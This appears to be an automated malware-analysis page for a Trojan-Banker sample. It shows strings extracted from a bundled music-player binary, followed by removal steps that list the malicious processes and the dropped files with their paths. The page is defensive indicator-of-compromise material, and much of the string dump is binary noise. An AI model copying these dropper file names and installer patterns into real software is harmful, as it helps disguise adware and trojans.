classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_s@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$alternative@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$list_parser@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@U?$chlit@D@234@Uno_list_endtoken@234@Uplain_parser_category@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$alternative@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@V1234@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Uend_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@
%Program Files%\YYMusic3\2014050713\YYMusic2.exe
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
#%DSZ
k/.ea"#>Nn
W%u3>C
f9Ky.RW`
125x125.jpg
L.Xkj
320x225.png
astop.png}W
back.png
bg2.png}SOh
bg3.png
bg_2.png}S]H
bk.png|
I[CsS%SC
.qO9M
t%7UfEa
zC%f 
]#%Sj
J%XDU@}T
8i.aV;
%fiHZZ9
3Nv%F
R%cV}V
mD%SK'l9
QC
bkcolor_1.png
bkcolor_2.png
bkcolor_3.png
bkcolor_4.png
bkcolor_5.png
bkcolor_6.png
bkcolor_7.png
border.png
L9q
btn-anonymity.png}
[).XF
'q.CAqK
btn-delete.png
btn-fav.png}Wy8
btn-login.png}
btn-login2.png
[%*,\4>66
%S;&DN
btn-next.png
btn-pause.png}X
btn-play.png
BtnHidePlayList.png
BtnRightTop.png
btn_9k.png}Wy8
btn_bd.png}Xy8
btn_close.png}Vy8
btn_comm.png
btn_db.png}W
btn_fh.png}XwT
btn_kw.png}
btn_ok.png}W
l[O{#. %x
btn_ok_blue.png
btn_ok_red.png}
btn_sc.png
=%uIS
btn_xm.png}X
button.png
channel.png
close.png
collection.png
ðxEuJxg
color_list_bk.png
\dl
dash.png}SM
DefaultUserImage.jpg
%S]wF
downd.png
downda.png
downdahover.png
DownLoadProgressForeImage.png
exit.png}U
fbcaptionbk.png
feedback.png}V
>/.Yhi
font_bkcolor.png
font_forecolor.png
forecolor_1.png
forecolor_2.png
forecolor_3.png
forecolor_4.png
.IDATx
forecolor_5.png
forecolor_6.png
forecolor_7.png
forgettt.jpg
frmdownmenu.xml
FrmDropDownMenuFrame.xml
FrmFeedBack.xmle
FrmHotKeyTip.xmlu
frmlogin.xml
FrmLrcChild.xmlU
FrmMenuFrame.xml
frmplayer.xml
frmplaylist.xml
frmProgressToolTip.xmlUPKN
frmWebBrowser.xml=
frmWindowLrc.xml%M1
frmWindowLrcParent.xml%
headimg.png}
d%U(.6
tG%C*
history.png
home.png}VgTS
hotkeytipbk.png
icon.png
input-password.png}U
input-user.png
like.png
!\Un%x
list.png
lista.png
D-wjÓ 
listahover.png
list_item_bg.png}S
list_pause.png
list_play.png
list_scroll_bar.png}SmH
list_scroll_bar2.png}S_H
{òC
list_title_bg.png}S
loading01.png
loading02.png
loading03.png
loading04.png
LoginBk.png
%S%hu.Y
g).IQ
LrcBk.png
u-3H}.
lrclist.png}Xy8
@.xn?
lyricdelete.png
lyricdeletea.png
lyricdeletea2.png
LyricFrameVoice.png
lyricmute.png
lyrictoplay.png
mainframeshadow.png
3.jUj
max.png
menu.png
min.png}SOh
mine.png
minea.png
mineahover.png
mini.png
mE)iVA.nP
more.png}SOH
musiclibrary.png
next.png}ViTSg
next0520.png
normalVolume.png}U
%DZRlj
play0520.png
play2.png
playerbg01.png
playerbg02.png
playerlist.png}X
playersidebg.jpg
playinging.jpg
playinginga.jpg
".Wlm
playingnext.png
playingplaying.jpg
playingprev.jpg
playingpreva.jpg
playingrandom.jpg
playingrandoma.jpg
playingvoice.png}V
PlayProgressForeImage.png
pl_back.png}S_h
pl_bg.png
pl_big.png
pl_btn_down.png}Tih
pl_btn_on.png
pl_close.png}S[H
pl_color.png
pl_desktop.png
pl_feedback.png}SKL
pl_forward.png}S_H
pl_icon.png}Wy8
pl_itself.png
pl_mutevol.png
pl_next.png}S_h
pl_pause.png}SKh
pl_prev.png
pl_res.png
pl_set.png
pl_small.png}Tmh
pl_split.png}S_h
pl_vol.png
pop_bkimage.png}U
power.png}XgTS
,&.,&#/!./*
prev.png}ViTS
prev0520.png
prevention.png
progresstooltip.png
progresstooltipbk.png
.ZfDrhe
T%s61K
m;.rA
progress_fore.png
pushedVolume.png
random.jpg
random01.jpg
random01a.jpg
random01hover.jpg
random02.jpg
random02a.jpg
random02hover.jpg
random03.jpg
random03a.jpg
random03hover.jpg
random0520.png
reflash.png
remembertt.jpg
scrollbar.png
search.png
E.Eg/&
SelectColor_SliderBar_Thumb.png
5).uZ
slider_bg.png
sound (2).jpg
sound.jpg
sound100.jpg
steup.png}
suspensionbig.png
suspensionbiga.png
suspensionbigahover.png
suspensionclose.png
suspensionclosea.png
suspensioncloseahover.png
suspensionfeedback.png
suspensionfeedbacka.png
suspensionfeedbackahover.png
suspensionlogin.png
suspensionmin.png
suspensionmina.png
suspensionminahover.png
suspensionset.png
suspensionseta.png
suspensionsetahover.png
suspensiontop.png
suspensiontopa.png
suspensiontopahover.png
system_menu_btnexit.png
system_menu_btnfeedback.png}V
system_menu_btnmin.png
;7%2uf
system_menu_btnmini.png
system_menu_btnsteup.png}
system_menu_btntop.png}W
sys_check_btn.png
sys_check_btn_blue.png
sys_check_btn_red.png
sys_check_btn_whiter.png
tab_comm.png
tooltipbk.png
update.xml
voice00528.png
voice0520.png
voice0a0528.png
voice1000528.png
voiceall0528.png
astop.png
bg2.png
bg_2.png
bk.png
btn-anonymity.png
btn-fav.png
btn-login.png
btn-pause.png
btn_9k.png
btn_bd.png
btn_close.png
btn_db.png
btn_fh.png
btn_kw.png
btn_ok.png
btn_ok_red.png
btn_xm.png
dash.png
exit.png
feedback.png
frmProgressToolTip.xml
frmWebBrowser.xml
headimg.png
home.png
input-password.png
list_item_bg.png
list_scroll_bar.png
list_scroll_bar2.png
list_title_bg.png
lrclist.png
min.png
more.png
next.png
normalVolume.png
playerlist.png
playingvoice.png
pl_back.png
pl_btn_down.png
pl_close.png
pl_feedback.png
pl_forward.png
pl_icon.png
pl_next.png
pl_small.png
pl_split.png
pop_bkimage.png
power.png
prev.png
steup.png
system_menu_btnfeedback.png
system_menu_btnsteup.png
system_menu_btntop.png
.Zuxf
tCPS
$;y)#%s
.QsvC
.VvC v
lH)Qk%c
4n.Ei
,GA.GS
2&383[3`3
1&2s2z2
2<3q3
3!3,333[3
5(626:6_6
0!0(010:0^0
6f6C6J6_6k6v6
1&1-1G1r1}1
; ;$;(;,;
3(42484|4
;);1;:;@;
01T1a1~1
6%6 61676^6
1(2D2P2\2h2t2
0 0$0(0,0004080<0@0
: :$:(:,:0:4:8:<:
<$<,<4<\<
4$4,444<4\4
mscoree.dll
LKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Skin\bkcolor_1.png
Skin\forecolor_1.png
Skin\bkcolor_2.png
Skin\forecolor_2.png
Skin\bkcolor_3.png
Skin\forecolor_3.png
Skin\bkcolor_4.png
Skin\forecolor_4.png
Skin\bkcolor_5.png
Skin\forecolor_5.png
Skin\bkcolor_6.png
Skin\forecolor_6.png
Skin\bkcolor_7.png
Skin\forecolor_7.png
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp
D:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp
!p.empty() && "Empty path not allowed for put_child."
errorUrl
D:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp
D:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp
D:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp
D:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp
D:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp
val.is_initialized()
D:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp
c.stack.size() >= 1
Song.music_id
Song.artid
Song.name
Song.artist
Song.special
Song.artist_pic240
Song.mp3path
Song.mp3dl
http://
=data.xcode
data.songList
D:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp
r.is_valid()
tplayList.trackList
Assertion failed: %s, file %s, line %d
1.14.4.30
MusicPla.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ImeReg32.exe:1160
    setup_2948-140896.exe:2632
    axult.exe:1744
    MBManager.exe:2480
    %original file name%.exe:132
    YYSpeed2.exe:2084
    setup_qd304.exe:2396
    setup_qd304.exe:1972
    Mutual.exe:2224
    YYMusic2.exe:3844
    setup_open_341.:2660
    axuls.exe:884
    Config.exe:1952
    Power.exe:2536
    Power.exe:1772
    WJSpeed.exe:2880
    WJSpeed.exe:3020
    ApkReg.exe:2652
    wuauclt.exe:540
    wjplay.exe:1456

  2. Delete the original Trojan-Banker file.
  3. Delete or disinfect the following files created/modified by the Trojan-Banker:

    %System%\gswb.ime (8657 bytes)
    %Program Files%\YYMusic3\2014050713\avutil-52.dll (5520 bytes)
    %Program Files%\YYMusic3\2014050713\avcodec-54.dll (23424 bytes)
    %Program Files%\YYMusic3\2014050713\Data\dh.ini (56 bytes)
    %Program Files%\YYMusic3\2014050713\Data\client.ini (36 bytes)
    %Program Files%\YYMusic3\2014050713\Unins.exe (9320 bytes)
    %Program Files%\YYMusic3\2014050713\source.dll (6584 bytes)
    %Program Files%\YYMusic3\2014050713\audio.dll (3616 bytes)
    %Program Files%\YYMusic3\2014050713\pthreadGC2.dll (3616 bytes)
    %Program Files%\YYMusic3\2014050713\Data\version.ini (32 bytes)
    %Program Files%\YYMusic3\2014050713\Data\user2.ini (22 bytes)
    %Program Files%\YYMusic3\2014050713\DuiLib.dll (16288 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\ÅäÖù¤¾ß\жÔØYYMusic3.lnk (830 bytes)
    %Program Files%\YYMusic3\2014050713\avformat-54.dll (12088 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\¹Ù·½Ö÷Ò³.lnk (334 bytes)
    %Program Files%\YYMusic3\2014050713\YYMusic2.exe (63950 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\YYMusic3.lnk (835 bytes)
    %Program Files%\YYMusic3\2014050713\SysConfig.ini (256 bytes)
    %Program Files%\YYMusic3\2014050713\libav.dll (6360 bytes)
    %Program Files%\YYMusic3\2014050713\channels.xml (784 bytes)
    %Program Files%\YYMusic3\2014050713\favorfm.xml (440 bytes)
    %Program Files%\YYMusic3\2014050713\avcore.dll (2392 bytes)
    %Program Files%\YYMusic3\2014050713\YYSpeed2.exe (22552 bytes)
    %Program Files%\YYMusic3\2014050713\Data\setup.ini (122 bytes)
    %Program Files%\YYMusic3\2014050713\swresample-0.dll (3312 bytes)
    %Program Files%\vsgrtaho\hzsoft\setup_qd304.exe (47709 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_qd304[1].exe (54004 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.dat (7419 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.dat (7419 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.idx (396 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.idx (588 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.dat (7419 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wb.custom.txt (196 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\UseVestige.ini (58 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.idx (396 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.dat (7419 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.dat (560 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.idx (396 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.idx (2061 bytes)
    %Program Files%\gssoft\gswb\Dict\PYPhrases.dat (196 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (111712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\py.custom.txt (196 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.cmp (1993 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.cmp (4529 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Config.ini (107405 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.cmp (1993 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.cmp (1993 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.idx (300 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.cmp (9639 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (210 bytes)
    %Program Files%\gssoft\gswb\Dict\WBPhrases.dat (196 bytes)
    %Program Files%\vsgrtaho\dciman32.dll (8 bytes)
    %Program Files%\vsgrtaho\d3dim.dll (13480 bytes)
    %Program Files%\vsgrtaho\ialmuDAN.dll (1151 bytes)
    %Program Files%\vsgrtaho\devmgr.dll (10953 bytes)
    %Program Files%\vsgrtaho\dmocx.dll (3576 bytes)
    %Program Files%\vsgrtaho\vsgrtaho.exe (8912 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@t3nlink[1].txt (186 bytes)
    %Program Files%\vsgrtaho\axuls.exe (48238 bytes)
    %Program Files%\vsgrtaho\axult.exe (42791 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\popup[1].htm (627 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pic[1].gif (719 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_open_341[1].exe (426802 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_2948-140896[1].exe (606444 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\axult[1].exe (45478 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\yszj_zhimeng_160110[1].exe (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pwb[1].htm (961 bytes)
    %Program Files%\vsgrtaho\setup_open_341.exe (324463 bytes)
    %Program Files%\vsgrtaho\pwb.dll (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (801 bytes)
    %Program Files%\vsgrtaho\setup_2948-140896.exe (432700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\softcount[1].htm (109 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\axuls[1].exe (49534 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@adsvc2.9365[1].txt (321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].php (1121 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (5204 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Program Files%\gssoft\gswb\Dict\Header.dat (2 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WbUpd.exe (26688 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\¿ìÀÖÅ®º¢.gss (1552 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Tool.exe (22192 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ImeUtil.exe (60186 bytes)
    %Program Files%\gssoft\gswb\Dict\wb.idx (66168 bytes)
    %Program Files%\Common Files\gssoft\gssoft.ini (52 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe (25112 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\uninst.exe (11344 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Statistics.dll (19096 bytes)
    %Program Files%\gssoft\gswb\Dict\lx.dat (99214 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\gswb32.ime (39329 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Config.exe (37025 bytes)
    %Program Files%\gssoft\gswb\Dict\yy.dat (30464 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\wdj_connection_wrapper.dll (12088 bytes)
    %Program Files%\gssoft\gswb\Dict\gbk.idx (15168 bytes)
    %Program Files%\gssoft\gswb\Dict\url.dat (5 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WdjRelated.dll (40228 bytes)
    %Program Files%\gssoft\gswb\Dict\yy.idx (100378 bytes)
    %Program Files%\gssoft\gswb\Dict\py.s.idx (14184 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WdjEngine.dll (65930 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Expand.dll (46916 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\À¶É«±ù¸ñ.gss (1552 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\gswb64.ime (60186 bytes)
    %Program Files%\gssoft\gswb\˵Ã÷.txt (195 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe (15168 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ImeReg32.exe (7192 bytes)
    %Program Files%\gssoft\gswb\Dict\gbk.dat (1856 bytes)
    %Program Files%\gssoft\gswb\Dict\py.u.v1.idx (457160 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Power.exe (9608 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\MBManager.exe (35507 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Service.dll (11344 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Wizard.exe (77238 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WDJDriverPreinstaller.exe (8184 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe (8560 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ImeReg64.exe (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (1110700 bytes)
    %Program Files%\Common Files\gssoft\gswb\gswb.ini (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp\System.dll (11 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\aapt.exe (197953 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\ÐÝÏÐ.gss (2392 bytes)
    %Program Files%\gssoft\gswb\Dict\wb.dat (19152 bytes)
    %Program Files%\gssoft\gswb\Dict\dz.dat (16288 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\»·±£ÂÌ.gss (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\metadl.dll (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\setup_qd304.gif.partial (101143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (8533 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\属性设置.lnk (792 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\设置向导.lnk (792 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\»·±£ÂÌ.gss (42 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\官方网站.url (230 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjEngine.dll (14988 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WbUpd.exe (5873 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SkinReg.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Mutual.exe (5441 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\wdj_connection_wrapper.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Service.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\ÐÝÏÐ.gss (601 bytes)
